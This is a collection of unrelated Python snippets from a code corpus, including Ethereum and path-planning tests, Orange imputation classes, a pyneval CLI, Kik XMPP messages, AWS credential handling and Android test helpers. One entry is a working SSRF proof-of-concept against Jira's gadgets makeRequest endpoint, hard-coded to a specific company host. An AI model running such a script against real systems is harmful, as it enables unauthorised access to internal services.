id | content
---|---
38027
|
def test_deploying_contract(client, hex_accounts):
pre_balance = client.get_balance(hex_accounts[1])
client.send_transaction(
_from=hex_accounts[0],
to=hex_accounts[1],
value=1234,
)
post_balance = client.get_balance(hex_accounts[1])
assert post_balance - pre_balance == 1234
|
38039
|
import argparse
import importlib
import os
import sys
import jsonschema
import pkg_resources
from multiprocessing import Pool, cpu_count
from pyneval.errors.exceptions import InvalidMetricError, PyNevalError
from pyneval.pyneval_io import json_io
from pyneval.pyneval_io import swc_io
from pyneval.metric.utils import anno_utils, config_utils
from pyneval.metric.utils import cli_utils
from pyneval.metric.utils.metric_manager import get_metric_manager
from pyneval.tools.optimize import optimize
# dynamically import every *_metric module under pyneval/metric
def import_metrics():
base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
metric_path = os.path.join(base_dir, "pyneval/metric")
files = os.listdir(metric_path)
metrics = []
for f in files:
m_f = f.split(".")
if len(m_f) == 2 and m_f[0][-7:] == "_metric" and m_f[1] == "py":
metrics.append(m_f[0])
for m in metrics:
md = "pyneval.metric.{}".format(m)
importlib.import_module(md)
def read_parameters():
metric_manager = get_metric_manager()
parser = argparse.ArgumentParser(description="Current version: pyneval {}".format(
pkg_resources.require("pyneval")[0].version)
)
parser.add_argument(
"--gold",
"-G",
help="path of the gold standard SWC file",
required=False
)
parser.add_argument(
"--test",
"-T",
help="a list of reconstructed SWC files or folders for evaluation",
required=False,
nargs="*"
)
parser.add_argument(
"--metric",
"-M",
help="metric choice: " + metric_manager.get_metric_summary(False) + ".",
required=False
)
parser.add_argument(
"--output",
"-O",
help="output path of metric results, output file is in json format with different scores of the metric",
required=False,
)
parser.add_argument(
"--detail",
"-D",
        help="output path of the detailed metric result, presented in SWC format.\n"
             "node types are assigned to each node according to its metric result",
required=False,
)
parser.add_argument(
"--config",
"-C",
help="path of custom configuration file for the specified metric",
required=False,
)
parser.add_argument(
"--parallel",
"-P",
        help="Enable parallel processing",
required=False,
action="store_true"
)
parser.add_argument(
"--optimize",
help="Enable optimizer mode",
required=False,
)
parser.add_argument(
"--path_validation",
help="Enable detailed path validation check",
required=False,
action="store_true"
)
parser.add_argument("--debug", help="print debug info or not", required=False, action="store_true")
return parser.parse_args()
def init(abs_dir):
sys.path.append(abs_dir)
sys.path.append(os.path.join(abs_dir, "src"))
sys.path.append(os.path.join(abs_dir, "test"))
sys.setrecursionlimit(1000000)
def set_configs(abs_dir, args):
    # argument: debug (--debug is a store_true flag, so it is already a boolean)
    is_debug = bool(args.debug)
# argument: gold
gold_swc_path = os.path.join(abs_dir, args.gold)
gold_swc_tree = swc_io.read_swc_tree(gold_swc_path) # SwcTree
# argument: metric
metric_manager = get_metric_manager()
metric = metric_manager.get_root_metric(args.metric)
if not metric:
raise InvalidMetricError(args.metric, metric_manager.get_metric_summary(True))
# argument: test
test_swc_paths = [os.path.join(abs_dir, path) for path in args.test]
test_swc_trees = []
# read test trees
for file in test_swc_paths:
if file[-4:].lower() == ".tif":
continue
test_swc_trees.extend(swc_io.read_swc_trees(file))
if len(test_swc_paths) == 0:
raise PyNevalError("test models can't be null")
# info: how many trees read
print("Evaluating {} test model(s) \n".format(len(test_swc_trees)))
# argument: config
config_path = args.config
if config_path is None:
config = config_utils.get_default_configs(metric)
else:
config = json_io.read_json(config_path)
config_schema = config_utils.get_config_schema(metric)
jsonschema.validate(config, config_schema)
# argument: output
output_path = None
if args.output:
output_path = os.path.join(abs_dir, args.output)
# argument: detail
detail_dir = None
if args.detail:
detail_dir = os.path.join(abs_dir, args.detail)
# argument: parallel
is_parallel = False
if args.parallel:
is_parallel = args.parallel
is_path_validation = False
if args.path_validation:
is_path_validation = args.path_validation
# argument: optimize
optimize_config = None
if args.optimize:
optimize_config = json_io.read_json(args.optimize)
return gold_swc_tree, test_swc_trees, test_swc_paths, metric, output_path, detail_dir, config, is_debug, is_parallel, optimize_config, is_path_validation
def execute_metric(metric, gold_swc_tree, test_swc_tree, config, detail_dir, output_path, metric_method, is_path_validation):
test_swc_name = test_swc_tree.name()
result, res_gold_swc_tree, res_test_swc_tree = metric_method(
gold_swc_tree=gold_swc_tree, test_swc_tree=test_swc_tree, config=config
)
screen_output = config_utils.get_screen_output()
result_info = ""
for key in result:
if key in screen_output[metric]:
result_info += "{} = {}\n".format(key.ljust(15, " "), result[key])
print("---------------Result---------------\n" +
"swc_file_name = {}\n".format(test_swc_name) +
result_info +
"----------------End-----------------\n"
)
base_file_name = test_swc_name[:-4] + "_" + metric + "_"
def save_detail(swc_tree, file_name):
detail_path = os.path.normpath(os.path.join(detail_dir, file_name))
if is_path_validation:
detail_path = cli_utils.path_validation(detail_path, ".swc")
else:
detail_path = cli_utils.make_sure_path_not_exist(detail_path)
ok = False
if detail_path is not None:
ok = swc_io.swc_save(
swc_tree=swc_tree,
out_path=detail_path,
extra=anno_utils.get_detail_type(metric),
)
if detail_path is None or not ok:
print("[Warning:] Failed to save details: {}".format(file_name))
if detail_dir:
if res_gold_swc_tree is not None:
save_detail(res_gold_swc_tree, base_file_name+"recall.swc")
if res_test_swc_tree is not None:
save_detail(res_test_swc_tree, base_file_name+"precision.swc")
if output_path:
if is_path_validation:
output_path = cli_utils.path_validation(output_path, ".json")
else:
output_path = cli_utils.make_sure_path_not_exist(output_path)
ok = False
if output_path is not None:
ok = json_io.save_json(data=result, json_file_path=output_path)
if ok:
print("[Info:] Output saved")
if output_path is None or not ok:
print("[Warning:] Failed to save output")
# command program
def run():
abs_dir = os.path.abspath("")
import_metrics()
init(abs_dir)
args = read_parameters()
gold_swc_tree, test_swc_trees, test_swc_paths, metric, output_path, detail_dir, \
config, is_debug, is_parallel, optimize_config, is_path_validation = set_configs(abs_dir, args)
metric_manager = get_metric_manager()
metric_method = metric_manager.get_metric_method(metric)
if optimize_config is not None:
optimize.optimize(gold_swc_tree=gold_swc_tree, test_swc_paths=test_swc_paths,
optimize_config=optimize_config, metric_config=config, metric_method=metric_method)
elif is_parallel:
# use multi process
max_procs = cpu_count()
if len(test_swc_trees) < max_procs:
max_procs = len(test_swc_trees)
p_pool = Pool(max_procs)
for test_swc_tree in test_swc_trees:
p_pool.apply_async(
                execute_metric,
args=(metric, gold_swc_tree, test_swc_tree, config, detail_dir, output_path, metric_method, is_path_validation),
)
p_pool.close()
p_pool.join()
else:
for test_swc_tree in test_swc_trees:
            execute_metric(
metric=metric,
gold_swc_tree=gold_swc_tree,
test_swc_tree=test_swc_tree,
config=config,
detail_dir=detail_dir,
output_path=output_path,
metric_method=metric_method,
is_path_validation=is_path_validation,
)
print("Done!")
if __name__ == "__main__":
sys.exit(run())
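# --- Hedged usage sketch (editor addition; file names and the metric name are
# placeholders, assuming the package installs a `pyneval` console entry point) ---
#   pyneval --gold data/gold.swc --test data/recon_1.swc data/recon_2.swc \
#           --metric ssd --output results.json --detail detail_out --parallel
# The value passed to --metric must be one registered with the metric manager
# (see the --metric help text produced by read_parameters above).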
|
38087
|
import numpy as np
import scipy.sparse as sp
import Orange.data
from Orange.statistics import distribution, basic_stats
from Orange.util import Reprable
from .transformation import Transformation, Lookup
__all__ = [
"ReplaceUnknowns",
"Average",
"DoNotImpute",
"DropInstances",
"Model",
"AsValue",
"Random",
"Default",
]
class ReplaceUnknowns(Transformation):
"""
A column transformation which replaces unknown values with a fixed `value`.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
value : int or float
The value with which to replace the unknown values
"""
def __init__(self, variable, value=0):
super().__init__(variable)
self.value = value
def transform(self, c):
if sp.issparse(c):
c.data = np.where(np.isnan(c.data), self.value, c.data)
return c
else:
return np.where(np.isnan(c), self.value, c)
class BaseImputeMethod(Reprable):
name = ""
short_name = ""
description = ""
format = "{var.name} -> {self.short_name}"
columns_only = False
def __call__(self, data, variable):
""" Imputes table along variable column.
Args:
data (Table): A table to impute.
variable (Variable): Variable for completing missing values.
Returns:
            A new Variable instance with completed missing values or
            an array mask of rows to drop.
"""
raise NotImplementedError
def format_variable(self, var):
return self.format.format(var=var, self=self)
def __str__(self):
return self.name
def copy(self):
return self
@classmethod
def supports_variable(cls, variable):
return True
class DoNotImpute(BaseImputeMethod):
name = "Don't impute"
short_name = "leave"
description = ""
def __call__(self, data, variable):
return variable
class DropInstances(BaseImputeMethod):
name = "Remove instances with unknown values"
short_name = "drop"
description = ""
def __call__(self, data, variable):
col, _ = data.get_column_view(variable)
return np.isnan(col)
class Average(BaseImputeMethod):
name = "Average/Most frequent"
short_name = "average"
description = "Replace with average/mode of the column"
def __call__(self, data, variable, value=None):
variable = data.domain[variable]
if value is None:
if variable.is_continuous:
stats = basic_stats.BasicStats(data, variable)
value = stats.mean
elif variable.is_discrete:
dist = distribution.get_distribution(data, variable)
value = dist.modus()
else:
raise TypeError("Variable must be continuous or discrete")
a = variable.copy(compute_value=ReplaceUnknowns(variable, value))
a.to_sql = ImputeSql(variable, value)
return a
class ImputeSql(Reprable):
def __init__(self, var, default):
self.var = var
self.default = default
def __call__(self):
return "coalesce(%s, %s)" % (self.var.to_sql(), str(self.default))
class Default(BaseImputeMethod):
name = "Value"
short_name = "value"
description = ""
columns_only = True
format = "{var} -> {self.default}"
def __init__(self, default=0):
self.default = default
def __call__(self, data, variable, *, default=None):
variable = data.domain[variable]
default = default if default is not None else self.default
return variable.copy(compute_value=ReplaceUnknowns(variable, default))
def copy(self):
return Default(self.default)
class ReplaceUnknownsModel(Reprable):
"""
Replace unknown values with predicted values using a `Orange.base.Model`
Parameters
----------
variable : Orange.data.Variable
The target variable for the imputation.
model : Orange.base.Model
A fitted model predicting `variable`.
"""
def __init__(self, variable, model):
assert model.domain.class_var == variable
self.variable = variable
self.model = model
def __call__(self, data):
if isinstance(data, Orange.data.Instance):
column = np.array([float(data[self.variable])])
else:
column = np.array(data.get_column_view(self.variable)[0], copy=True)
mask = np.isnan(column)
if not np.any(mask):
return column
if isinstance(data, Orange.data.Instance):
predicted = self.model(data)
else:
predicted = self.model(data[mask])
column[mask] = predicted
return column
class Model(BaseImputeMethod):
_name = "Model-based imputer"
short_name = "model"
description = ""
format = BaseImputeMethod.format + " ({self.learner.name})"
@property
def name(self):
return "{} ({})".format(self._name, getattr(self.learner, "name", ""))
def __init__(self, learner):
self.learner = learner
def __call__(self, data, variable):
variable = data.domain[variable]
domain = domain_with_class_var(data.domain, variable)
if self.learner.check_learner_adequacy(domain):
data = data.transform(domain)
model = self.learner(data)
assert model.domain.class_var == variable
return variable.copy(compute_value=ReplaceUnknownsModel(variable, model))
else:
raise ValueError(
"`{}` doesn't support domain type".format(self.learner.name)
)
def copy(self):
return Model(self.learner)
def supports_variable(self, variable):
domain = Orange.data.Domain([], class_vars=variable)
return self.learner.check_learner_adequacy(domain)
def domain_with_class_var(domain, class_var):
"""
Return a domain with class_var as output domain.class_var.
If class_var is in the input domain's attributes it is removed from the
output's domain.attributes.
"""
if domain.class_var is class_var:
return domain
elif class_var in domain.attributes:
attrs = [var for var in domain.attributes if var is not class_var]
else:
attrs = domain.attributes
return Orange.data.Domain(attrs, class_var)
class IsDefined(Transformation):
def transform(self, c):
if sp.issparse(c):
c = c.toarray()
return ~np.isnan(c)
class AsValue(BaseImputeMethod):
name = "As a distinct value"
short_name = "new value"
description = ""
def __call__(self, data, variable):
variable = data.domain[variable]
if variable.is_discrete:
fmt = "{var.name}"
value = "N/A"
var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=variable.values + [value],
base_value=variable.base_value,
compute_value=Lookup(
variable,
np.arange(len(variable.values), dtype=int),
unknown=len(variable.values),
),
sparse=variable.sparse,
)
return var
elif variable.is_continuous:
fmt = "{var.name}_def"
indicator_var = Orange.data.DiscreteVariable(
fmt.format(var=variable),
values=("undef", "def"),
compute_value=IsDefined(variable),
sparse=variable.sparse,
)
stats = basic_stats.BasicStats(data, variable)
return (
variable.copy(compute_value=ReplaceUnknowns(variable, stats.mean)),
indicator_var,
)
else:
raise TypeError(type(variable))
class ReplaceUnknownsRandom(Transformation):
"""
A column transformation replacing unknowns with values drawn randomly from
an empirical distribution.
Parameters
----------
variable : Orange.data.Variable
The target variable for imputation.
distribution : Orange.statistics.distribution.Distribution
The corresponding sampling distribution
"""
def __init__(self, variable, distribution):
assert distribution.size > 0
assert distribution.variable == variable
super().__init__(variable)
self.distribution = distribution
if variable.is_discrete:
counts = np.array(distribution)
elif variable.is_continuous:
counts = np.array(distribution)[1, :]
else:
raise TypeError("Only discrete and continuous " "variables are supported")
csum = np.sum(counts)
if csum > 0:
self.sample_prob = counts / csum
else:
self.sample_prob = np.ones_like(counts) / len(counts)
def transform(self, c):
if not sp.issparse(c):
c = np.array(c, copy=True)
else:
c = c.toarray().ravel()
nanindices = np.flatnonzero(np.isnan(c))
if self.variable.is_discrete:
sample = np.random.choice(
len(self.variable.values),
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
else:
sample = np.random.choice(
np.asarray(self.distribution)[0, :],
size=len(nanindices),
replace=True,
p=self.sample_prob,
)
c[nanindices] = sample
return c
class Random(BaseImputeMethod):
name = "Random values"
short_name = "random"
description = "Replace with a random value"
def __call__(self, data, variable):
variable = data.domain[variable]
dist = distribution.get_distribution(data, variable)
# A distribution is invalid if a continuous variable's column does not
# contain any known values or if a discrete variable's .values == []
isinvalid = dist.size == 0
if isinvalid and variable.is_discrete:
assert len(variable.values) == 0
raise ValueError("'{}' has no values".format(variable))
elif isinvalid and variable.is_continuous:
raise ValueError("'{}' has an unknown distribution".format(variable))
if variable.is_discrete and np.sum(dist) == 0:
dist += 1 / len(dist)
elif variable.is_continuous and np.sum(dist[1, :]) == 0:
dist[1, :] += 1 / dist.shape[1]
return variable.copy(compute_value=ReplaceUnknownsRandom(variable, dist))
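# --- Hedged usage sketch (editor addition): mean imputation of a single column.
# Assumes a standard Orange3 install; the dataset and column names are placeholders.
# from Orange.data import Table
# data = Table("heart_disease")
# var = data.domain["cholesterol"]
# imputed_var = Average()(data, var)               # variable carrying a ReplaceUnknowns compute_value
# domain = Orange.data.Domain([imputed_var], data.domain.class_vars)
# imputed = data.transform(domain)                 # unknowns replaced by the column mean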
|
38151
|
from bs4 import BeautifulSoup
import requests
import csv
import sys
from urllib.error import HTTPError
sys.path.append("..")
import mytemp
import time
import json
url='https://gz.17zwd.com/api/shop/get-list/73'
resp=requests.get(url)
with open('17wang.txt', 'w+', encoding='utf-8') as f:
    f.write(resp.text)
print(resp.text)
|
38157
|
import conftest # Add root path to sys.path
import os
import matplotlib.pyplot as plt
from PathPlanning.SpiralSpanningTreeCPP \
import spiral_spanning_tree_coverage_path_planner
spiral_spanning_tree_coverage_path_planner.do_animation = True
def spiral_stc_cpp(img, start):
num_free = 0
for i in range(img.shape[0]):
for j in range(img.shape[1]):
num_free += img[i][j]
STC_planner = spiral_spanning_tree_coverage_path_planner.\
SpiralSpanningTreeCoveragePlanner(img)
edge, route, path = STC_planner.plan(start)
covered_nodes = set()
for p, q in edge:
covered_nodes.add(p)
covered_nodes.add(q)
# assert complete coverage
assert len(covered_nodes) == num_free / 4
def test_spiral_stc_cpp_1():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test.png'))
start = (0, 0)
spiral_stc_cpp(img, start)
def test_spiral_stc_cpp_2():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test_2.png'))
start = (10, 0)
spiral_stc_cpp(img, start)
def test_spiral_stc_cpp_3():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test_3.png'))
start = (0, 0)
spiral_stc_cpp(img, start)
if __name__ == '__main__':
conftest.run_this_test(__file__)
|
38167
|
import requests
import sys
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:[email protected]/
def ssrf_poc(url, ssrf_url):
if url[-1] == '/':
url = url[:-1]
else:
url = url
vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Atlassian-Token": "<PASSWORD>",
"Connection": "close"
}
r = requests.get(url=vuln_url, headers=headers)
if r.status_code == 200 and 'set-cookie' in r.content:
print "\n>>>>Send poc Success!\n"
print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
print "\n>>>>vuln_url= " + vuln_url + '\n'
print r.content
else:
print "No Vuln Exit!"
if __name__ == "__main__":
while True:
print
ssrf_url = raw_input(">>>>SSRF URL: ")
url = "https://jira.liulishuo.work"
ssrf_poc(url, ssrf_url)
|
38213
|
from bs4 import BeautifulSoup
import time
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement, XMPPResponse
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
class OutgoingAcknowledgement(XMPPElement):
"""
Represents an outgoing acknowledgement for a message ID
"""
def __init__(self, sender_jid, is_receipt, ack_id, group_jid):
super().__init__()
self.sender_jid = sender_jid
self.group_jid = group_jid
self.is_receipt = is_receipt
self.ack_id = ack_id
def serialize(self):
timestamp = str(int(round(time.time() * 1000)))
user_ack_data = (
'<sender jid="{}">'
'<ack-id receipt="{}">{}</ack-id>'
'</sender>'
).format(self.sender_jid, str(self.is_receipt).lower(), self.ack_id)
group_ack_data = (
'<sender jid="{}" g="{}">'
'<ack-id receipt="{}">{}</ack-id>'
'</sender>'
).format(self.sender_jid, self.group_jid, str(self.is_receipt).lower(), self.ack_id)
data = ('<iq type="set" id="{}" cts="{}">'
'<query xmlns="kik:iq:QoS">'
'<msg-acks>'
'{}'
'</msg-acks>'
'<history attach="false" />'
'</query>'
'</iq>'
                ).format(self.message_id, timestamp, group_ack_data if self.group_jid is not None else user_ack_data)
return data.encode()
class OutgoingHistoryRequest(XMPPElement):
"""
Represents an outgoing request for the account's messaging history
"""
def __init__(self):
super().__init__()
def serialize(self):
timestamp = str(int(round(time.time() * 1000)))
data = ('<iq type="set" id="{}" cts="{}">'
'<query xmlns="kik:iq:QoS">'
'<msg-acks />'
'<history attach="true" />'
'</query>'
'</iq>'
).format(self.message_id, timestamp,)
return data.encode()
class HistoryResponse(XMPPResponse):
"""
Represents a Kik messaging history response.
"""
def __init__(self, data: BeautifulSoup):
super().__init__(data)
self.id = data["id"]
if data.query.history:
self.more = data.query.history.has_attr("more")
self.from_jid = data["from"]
self.messages = []
for message in data.query.history:
if message["type"] == "receipt":
args = {
'type':'receipt',
'from_jid': message["from"],
'receipt_type':message.receipt["type"],
'id':message.receipt.msgid["id"]
}
self.messages.append(Struct(**args))
elif message["type"] == "chat":
args = {
'type':'chat',
'id':message["id"],
'from_jid':message["from"],
'body': message.body.text if message.body else None,
'preview': message.preview.text if message.preview else None,
'timestamp': message.kik["timestamp"]
}
self.messages.append(Struct(**args))
elif message["type"] == "groupchat":
args = {
'type': 'groupchat',
'id': message["id"],
'from_jid': message["from"],
'body': message.body.text if message.body else None,
'preview': message.preview.text if message.preview else None,
'timestamp': message.kik["timestamp"],
'group_jid': message.g["jid"]
}
self.messages.append(Struct(**args))
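# --- Hedged usage sketch (editor addition; JIDs and IDs are placeholders, and
# `connection` stands for whatever object writes raw stanzas to the Kik stream) ---
# ack = OutgoingAcknowledgement(sender_jid="<sender-jid>", is_receipt=False,
#                               ack_id="<message-id>", group_jid=None)
# connection.send(ack.serialize())                  # hypothetical send method
# connection.send(OutgoingHistoryRequest().serialize())
# # the server's reply can then be parsed with HistoryResponse(BeautifulSoup(...))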
|
38277
|
from __future__ import absolute_import, division, print_function
import numpy as np
import tensorflow as tf
from IPython.core.debugger import Tracer; debug_here = Tracer();
batch_size = 5
max_it = tf.constant(6)
char_mat_1 = [[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0]]
char_mat_2 = [[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_3 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_4 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
char_mat_5 = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
#expected output: [5, 2, 4, 5, 4]
char_lst = [char_mat_1, char_mat_2, char_mat_3,
char_mat_4, char_mat_5]
np_char_tensor = np.array(char_lst)
char_prob = tf.constant(np.array(np_char_tensor), tf.float64)
char_prob = tf.transpose(char_prob, [1, 0, 2])
print(tf.Tensor.get_shape(char_prob))
sequence_length_lst = [1, 1, 1, 1, 1]
sequence_length = tf.constant(sequence_length_lst)
done_mask = tf.cast(tf.zeros(batch_size), tf.bool)
for time in range(0, 5):
print(time)
current_date = char_prob[:, time, :]
max_vals = tf.argmax(current_date, 1)
mask = tf.equal(max_vals, tf.constant(0, tf.int64))
current_mask = tf.logical_and(mask, tf.logical_not(done_mask))
done_mask = tf.logical_or(mask, done_mask)
time_vec = tf.ones(batch_size, tf.int32)*(time+2)
sequence_length = tf.select(done_mask, sequence_length, time_vec, name=None)
not_done_no = tf.reduce_sum(tf.cast(tf.logical_not(done_mask), tf.int32))
all_eos = tf.equal(not_done_no, tf.constant(0))
stop_loop = tf.logical_or(all_eos, tf.greater(time, max_it))
keep_working = tf.logical_not(stop_loop)
sess = tf.Session()
with sess.as_default():
tf.initialize_all_variables().run()
#print(char_prob.eval())
print(max_vals.eval())
print(mask.eval())
print(done_mask.eval())
print(sequence_length.eval())
print(keep_working.eval())
|
38286
|
import logging
import os
from figcli.config.style.color import Color
from figcli.io.input import Input
from figcli.svcs.config_manager import ConfigManager
from figcli.config.aws import *
from figcli.config.constants import *
log = logging.getLogger(__name__)
class AWSConfig:
"""
Utility methods for interacting with AWSCLI resources, such as the ~/.aws/credentials and ~/.aws/config files
"""
def __init__(self, color: Color = Color(False)):
self.init_files()
self.c = color
self._config = ConfigManager(AWS_CONFIG_FILE_PATH)
self._creds = ConfigManager(AWS_CREDENTIALS_FILE_PATH)
@staticmethod
def init_files():
os.makedirs(os.path.dirname(AWS_CREDENTIALS_FILE_PATH), exist_ok=True)
if not os.path.exists(AWS_CREDENTIALS_FILE_PATH):
with open(AWS_CREDENTIALS_FILE_PATH, "w+") as file:
file.write("")
if not os.path.exists(AWS_CONFIG_FILE_PATH):
with open(AWS_CONFIG_FILE_PATH, "w+") as file:
file.write("")
def _is_temporary_session(self, profile_name: str):
if self._creds.has_section(profile_name):
return self._creds.has_option(profile_name, AWS_CFG_TOKEN)
return False
def _backup_section(self, section: str):
backup_name, backup_profile = f'{section}-figgy-backup', f'profile {section}-figgy-backup'
profile_name = f'profile {section}'
if self._creds.has_section(section):
for opt in self._creds.options(section):
self._creds.set_config(backup_name, opt, self._creds.get_option(section, opt))
if self._config.has_section(profile_name):
for opt in self._config.options(profile_name):
self._config.set_config(backup_profile, opt, self._config.get_option(profile_name, opt))
    def restore(self, profile_name: str):
        """
        Restore credentials previously backed up by Figgy.
"""
config_profile = f'profile {profile_name}'
backup_name, backup_profile = f'{profile_name}-figgy-backup', f'profile {profile_name}-figgy-backup'
creds_restored, config_restored = False, False
if self._creds.has_section(backup_name):
for opt in self._creds.options(backup_name):
self._creds.set_config(profile_name, opt, self._creds.get_option(backup_name, opt))
creds_restored = True
if self._config.has_section(backup_profile):
for opt in self._config.options(backup_profile):
self._config.set_config(config_profile, opt, self._config.get_option(backup_profile, opt))
config_restored = True
self._creds.delete(profile_name, AWS_CFG_TOKEN)
self._creds.save()
self._config.save()
if creds_restored and config_restored:
print(f"\n{self.c.fg_gr}Restoration successful!{self.c.rs}")
else:
print(f"\n{self.c.fg_yl}Unable to restore credentials. Profile: "
f"{self.c.fg_bl}[{backup_name}]{self.c.rs}{self.c.fg_yl} was not found in either the "
f"~/.aws/credentials or ~/.aws/config files.{self.c.rs}")
def write_credentials(self, access_key: str, secret_key: str, token: str, region: str,
profile_name: str = 'default') -> None:
"""
Overwrite credentials stored in the [default] profile in both ~/.aws/config and ~/.aws/credentials file
with the provided temporary credentials. This method also CREATES these files if they do not already exist.
"""
if not self._is_temporary_session(profile_name):
print(f"\n{self.c.fg_yl}Existing AWS Profile {self.c.fg_bl}[{profile_name}]{self.c.rs}{self.c.fg_yl} "
f"was found with long-lived access keys "
f"in file: {self.c.fg_bl}~/.aws/credentials{self.c.rs}{self.c.fg_yl}.\n"
f"To avoid overwriting these keys, they will be moved under profile: "
f"{self.c.rs}{self.c.fg_bl}[{profile_name}-figgy-backup]{self.c.rs}{self.c.fg_yl}.{self.c.rs}\n\n"
f"These old keys may be restored with: {self.c.fg_bl}`"
f"{CLI_NAME} iam restore`{self.c.rs}.")
self._backup_section(profile_name)
self._creds.set_config(profile_name, AWS_CFG_ACCESS_KEY_ID, access_key)
self._creds.set_config(profile_name, AWS_CFG_SECRET_KEY, secret_key)
self._creds.set_config(profile_name, AWS_CFG_TOKEN, token)
config_section = f'profile {profile_name}'
self._config.set_config(config_section, AWS_CFG_REGION, region)
self._config.set_config(config_section, AWS_CFG_OUTPUT, 'json')
print(f"\n\n{self.c.fg_gr}Successfully updated: {AWS_CREDENTIALS_FILE_PATH}{self.c.rs}")
print(f"{self.c.fg_gr}Successfully updated: {AWS_CONFIG_FILE_PATH}{self.c.rs}")
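# --- Hedged usage sketch (editor addition; key values are placeholders) ---
# aws = AWSConfig(color=Color(True))
# aws.write_credentials(access_key="<access-key>", secret_key="<secret-key>",
#                       token="<session-token>", region="us-east-1",
#                       profile_name="default")
# ...later, to put back any long-lived keys that were backed up:
# aws.restore("default")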
|
38291
|
from __future__ import absolute_import
from contextlib import contextmanager
from multiprocessing import TimeoutError
import signal
import datetime
import os
import subprocess
import time
import urllib
import zipfile
import shutil
import pytest
from .adb import ADB
from ..logger import Logger
def get_center(bounds):
"""
Returns given element center coords::
from magneto.utils import get_center
element = self.magneto(text='Foo')
(x, y) = get_center(element.info['bounds'])
:param dict bounds: Element position coordinates (top, right, bottom, left)
:return: x and y coordinates of element center
"""
x = bounds['right'] - ((bounds['right'] - bounds['left']) / 2)
y = bounds['bottom'] - ((bounds['bottom'] - bounds['top']) / 2)
return x, y
def get_config(attr, default=None):
"""
Allows access to config parameters::
from magneto.utils import get_config
package = get_config('--app-package')
:param str attr: Command line argument
:return: Requested config value
"""
# must have this check to avoid sphinx-autodoc exception
if getattr(pytest, 'config', None) != None:
return pytest.config.getoption(attr) or default
else:
return default
@contextmanager
def timewarp(timedelta_):
now = datetime.datetime.now()
future = now + timedelta_
ADB.set_datetime(future)
try:
yield
finally:
now = datetime.datetime.now()
ADB.set_datetime(now)
class Timeout():
"""
Allows polling a function till success or timeout::
import time
from magneto.utils import Timeout
result = False
with Timeout(seconds=5):
while not result:
result = some_function()
time.sleep(0.5)
:param integer seconds: Timeout value in seconds. Defaults to 1.
:param str error_message: Error message to display when timeout occurs. Defaults to 'Timeout'.
"""
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds or 1
self.error_message = error_message
def handle_timeout(self, signum, frame):
Logger.debug('Timeout reached {} seconds limit'.format(self.seconds))
raise TimeoutError(self.error_message)
def __enter__(self):
Logger.debug('Timeout started for {} seconds'.format(self.seconds))
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
Logger.debug('Timeout stopped.')
signal.alarm(0)
def unlock_device():
"""
Powers on device and unlocks it.
"""
# read device screen state
p = ADB.exec_cmd("shell 'if [ -z $(dumpsys power | grep mScreenOn=true) ]; then echo off; else echo on;fi'",
stdout=subprocess.PIPE)
device_screen = p.stdout.readline().strip('\r\n')
if device_screen == 'off':
# power on device
ADB.exec_cmd('shell input keyevent 26').wait()
# unlock device
ADB.exec_cmd('shell input keyevent 82').wait()
def wait_for_device():
"""
Wait for device to boot. 1 minute timeout.
"""
wait_for_device_cmd = 'wait-for-device shell getprop sys.boot_completed'
p = ADB.exec_cmd(wait_for_device_cmd, stdout=subprocess.PIPE)
boot_completed = p.stdout.readline().strip('\r\n')
try:
with Timeout(seconds=60):
while boot_completed != '1':
time.sleep(1)
p = ADB.exec_cmd(wait_for_device_cmd, stdout=subprocess.PIPE)
boot_completed = p.stdout.readline().strip('\r\n')
